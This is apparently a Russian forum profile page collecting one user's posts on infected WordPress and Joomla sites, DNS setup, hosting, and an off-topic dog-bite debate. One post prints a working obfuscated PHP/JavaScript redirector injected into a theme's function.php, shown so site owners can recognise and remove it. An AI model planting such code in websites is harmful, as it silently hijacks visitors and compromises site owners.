WebGomel

WebGomel
Рейтинг
78
Регистрация
29.10.2011
Интересы
Сисадмин
zonar:

А вот Гугл проверил и снял санкции со всех внутренних страниц.
zonar:

Но главную станицу и несколько внутренних все равно оставил как потенциально опасную.

Ничего не понял, то вы говорите снял со всех внутренних страниц, то несколько страниц осталось.

Гугл проверяет сайты обычно в течении суток и если уж он дорвался до сайта, то обычно проверяет все страницы, которые помечены как содержащие вредоносный код. И всё это происходит довольно быстро, 2-3 часа. Это Яндекс может и месяц проверять.

И кстати, антивирусами сайты не лечат, полистайте раздел Веб-строительство там и скрипты есть для поиска шеллов, и советов целая куча.

JS.Redirector.112 ваш это дописанный в function.php темы код вида:

<?php  

add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r***91;e(c)***93;=k***91;c***93;||e(c);k=***91;function(e){return r***91;e***93;}***93;;e=function(){return'\\\w+'};c=1};while(c--)if(k***91;c***93;)p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k***91;c***93;);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")***91;0***93;;',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

Это надо удалить. и да, менять пароли, искать шеллы :)

jacob888:

Мой хостер сам отключает доступ от впс что бы я ему больше платил денег.

Это как? вырубает ssh на впс и говорит - "плати мне больше денег, а то на сайты свои не попадёшь". Или всё же что-то другое у вас происходит?

Также не однозначно понятно что именно вы ищите, вип хостинг, или впс? А может проще сервер? Вот, как вариант сервер с учётом ваших требований, правда как оно там будет работать не знаю, только вчера увидел его, но зато никто ничего не отключит, дорого? :)

Действительно, что это за ерунда, балансируем между вторым и третьим местом? Должно уже быть первое, причём с огромным отрывом :)

Товарищи, хватит уже кошерно котов истреблять, проявите гражданскую активность, голосуйте активнее! :)

Раз у REG.ru прописаны ns1.reg.ru и ns2.reg.ru - значит домен поддерживается на их ДНС. Следовательно то, что прописано в ISPmanager вас не касается.

Если у REG.ru есть редактор днс (что я точно не помню), то там необходимо вписать все остальные записи, которые вы видите в ISPmanager, кроме записей ns

То есть достаточно добавить запись типа А c IP адресом сайта - и ваш сайт уже будет работать.

Надеюсь принцип понятен - ДНС держит REG.ru, но в них прописаны записи, которые отправляют посетителей на ваш сервер и соответственно на сайт.

Из других вариантов - настроить собственные ДНС, или например использовать сторонние ДНС, как вариант ДНС от Яндекса.

Light Phantom:

Объявился программист, который мне регулярно сайт допиливает. Он все же против обновления. Будем следить за логами и искать дыру.
Отпишусь потом, если будет что рассказать :)

Какой то странный программист если честно. Очень я сомневаюсь что он именно в самом движке какие-то изменения делал.

Ну раз решили логи смотреть - пожалуйста, возможно вы там увидите как именно сбрасывают пароль, а всё ведь происходит именно так: сбросили пароль, вошли в админку, натворили дел. Мне к сожалению логи такие не попадались, так что тут не помогу.

И да, не хочет обновляться - так пусть админку хоть закроет, ну сбросят пароль, зато дальше не попадут и больше соответственно ничего не сделают. :)

Loko:
а если дите в кормушку полезет, нормальный собак укусит?

Та нафиг таких зверей, которые за свою миску порвут, вообще дома держать тем более, когда дети есть маленькие. Таким место никак не в квартире, где дитё играется, так что в подобных травмах именно вина родителей, и именно в том, что они держут такого собакена.

Некоторые кстати и хозяев своих жрут за милую душу, мало таких случаев?

Вон у меня в деревне кот и собака едят из одной миски и нормально всё, порычат - пошипят друг на друга и дальше кормятся. 😂 Пёс старый, хоть и не породистый, но во двор фиг кого постороннего пустит.

gagarin123:
chmod 444 /templates/imya-shablona/index.php

не поможет это, я уже несколько раз писал об этом

Обновляйте саму джумлу на 1.5.26, это не особо страшно, и закройте админку, чтобы просто так в неё нельзя было попасть. Сам VirtueMart не трогайте.

К слову, до 1.5.25 видимо эксплуатируют какую то уязвимость, позволяющую сбрасывать пароль админа. Недавно на одном сайте на 1.5.25 (практически только с родными дополнениями) пароль сбросили, а в админку войти не смогли, так как стоял компонент jsecure, он единственный был из неродных.

Однако иногда пароль не сбрасывают, а именно входят под существующим, как его достают пока не ясно.

Подобных взломов на 1.5.26 я пока не встречал, так что скорее всего в ней уязвимость закрыли.

ЗЫ: обновляйтесь не тем обновлением, что 1.5.0_to_1.5.26, а лучше тем, что с 1.5.14, на офф сайте оно есть до 1.5.23, ну а затем на 1.5.24 и т.д., так всё же меньше файлов зацепите. Все эти обновления я собрал у себя, если конечно не боитесь - можете взять мои, а нет - так ищите на офф сайте, всё оттуда. Ну а затем если что сломается - восстанавливайте это что-то из бэкапов.

Обычно если ломается что-то, то это модули и компоненты, которые кстати при грамотном создании сайта должны быть вынесены в шаблон, и соответственно ничего ломаться не должно.

Ок, ставим себя на место хозяина собаки.

То есть ваш пёс взял и покусал ребёнка, не важно своего или соседского и не важно при каких обстоятельствах.

Какие ваши действия по отношению к собаке?

Понять и простить? Или же минимум - посадка на вечную короткую цепь на улице, а максимум смертный приговор.

nils, не фантазируйте.

У меня у самого есть дети, ездим в деревню к бабушкам, и там и там собаки, за детьми фиг уследишь, приколупываются так к этим зверям, что те еле прятаться успевают. Но нормальный собак чувствует ребёнка и никогда не укусит, даже если тот его за хвост начнёт по квартире таскать.

Всего: 443